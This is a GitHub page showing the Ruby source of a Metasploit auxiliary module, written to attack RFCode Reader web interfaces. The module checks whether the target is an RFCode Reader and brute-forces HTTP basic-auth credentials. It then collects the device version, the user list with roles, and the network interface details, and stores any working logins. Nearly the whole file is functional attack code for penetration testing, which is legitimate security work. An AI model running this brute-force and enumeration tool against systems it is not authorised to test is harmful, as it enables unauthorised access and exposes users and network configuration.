-
Notifications
You must be signed in to change notification settings - Fork 13.8k
/
rfcode_reader_enum.rb
268 lines (232 loc) · 7.58 KB
/
rfcode_reader_enum.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'RFCode Reader Web Interface Login / Bruteforce Utility',
'Description' => %{
This module simply attempts to login to a RFCode Reader web interface.
Please note that by default there is no authentication. In such a case, password brute force will not be performed.
If there is authentication configured, the module will attempt to find valid login credentials and capture device information.
},
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
],
'License' => MSF_LICENSE
))
register_options(
[
OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", true])
])
end
#
# Info-Only
# Identify logged in user: /rfcode_reader/api/whoami.json
# Capture list of users: /rfcode_reader/api/userlist.json
# Interface configuration: /rfcode_reader/api/interfacestatus.json
# Device platform details: /rfcode_reader/api/version.json
#
def run_host(ip)
unless is_app_rfreader?
print_error("#{rhost}:#{rport} - Application does not appear to be RFCode Reader. Module will not continue.")
return
end
print_status("#{rhost}:#{rport} - Checking if authentication is required...")
unless is_auth_required?
print_warning("#{rhost}:#{rport} - Application does not require authentication.")
user = ''
pass = ''
# Collect device platform & configuration info
collect_info(user, pass)
return
end
print_status("#{rhost}:#{rport} - Brute-forcing...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
#
# What's the point of running this module if the app actually isn't RFCode Reader?
#
def is_app_rfreader?
res = send_request_cgi(
{
'uri' => '/rfcode_reader/api/whoami.json',
'vars_get' =>
{
'_dc' => '1369680704481'
}
})
return (res and res.code != 404)
end
#
# The default install of RFCode Reader app does not require authentication. Instead, it'll log the
# user right in. If that's the case, no point to brute-force, either.
#
def is_auth_required?
user = ''
pass = ''
res = send_request_cgi(
{
'uri' => '/rfcode_reader/api/whoami.json',
'method' => 'GET',
'authorization' => basic_auth(user,pass),
'vars_get' =>
{
'_dc' => '1369680704481'
}
})
return (res and res.body =~ /{ }/) ? false : true
end
#
# Brute-force the login page
#
def do_login(user, pass)
vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/rfcode_reader/api/whoami.json',
'method' => 'GET',
'authorization' => basic_auth(user,pass),
'vars_get' =>
{
'_dc' => '1369680704481'
}
})
if not res or res.code == 401
vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
else
print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
collect_info(user, pass)
report_cred(
ip: rhost,
port: rport,
service_name: 'RFCode Reader',
user: user,
password: pass,
proof: res.code.to_s
)
return :next_user
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
return :abort
end
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: Time.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
#
# Collect target info
#
def collect_info(user, pass)
vprint_status("#{rhost}:#{rport} - Collecting information from app as #{user.inspect}:#{pass.inspect}...")
begin
res = send_request_cgi(
{
'uri' => '/rfcode_reader/api/version.json',
'method' => 'GET',
'authorization' => basic_auth(user,pass),
'vars_get' =>
{
'_dc' => '1370460180056'
}
})
if res and res.body
release_ver = JSON.parse(res.body)["release"]
product_name = JSON.parse(res.body)["product"]
vprint_status("#{rhost}:#{rport} - Collecting device platform info...")
vprint_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'")
report_note(
:host => rhost,
:proto => 'tcp',
:port => rport,
:sname => "RFCode Reader",
:data => "Release Version: #{release_ver}, Product: #{product_name}",
:type => 'Info'
)
end
res = send_request_cgi(
{
'uri' => '/rfcode_reader/api/userlist.json',
'method' => 'GET',
'authorization' => basic_auth(user,pass),
'vars_get' =>
{
'_dc' => '1370353972710'
}
})
if res and res.body
userlist = JSON.parse(res.body)
vprint_status("#{rhost}:#{rport} - Collecting user list...")
vprint_good("#{rhost}:#{rport} - User list & role: #{userlist}")
report_note(
:host => rhost,
:proto => 'tcp',
:port => rport,
:sname => "RFCode Reader",
:data => "User List & Roles: #{userlist}",
:type => 'Info'
)
end
res = send_request_cgi(
{
'uri' => '/rfcode_reader/api/interfacestatus.json',
'method' => 'GET',
'authorization' => basic_auth(user,pass),
'vars_get' =>
{
'_dc' => '1369678668067'
}
})
if res and res.body
eth0_info = JSON.parse(res.body)["eth0"]
vprint_status("#{rhost}:#{rport} - Collecting interface info...")
vprint_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}")
report_note(
:host => rhost,
:proto => 'tcp',
:port => rport,
:sname => "RFCode Reader",
:data => "Interface eth0: #{eth0_info}",
:type => 'Info'
)
end
return
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
vprint_error("#{rhost}:#{rport} - HTTP Connection Failed while collecting info")
return
rescue JSON::ParserError
vprint_error("#{rhost}:#{rport} - Unable to parse JSON response while collecting info")
return
end
end
end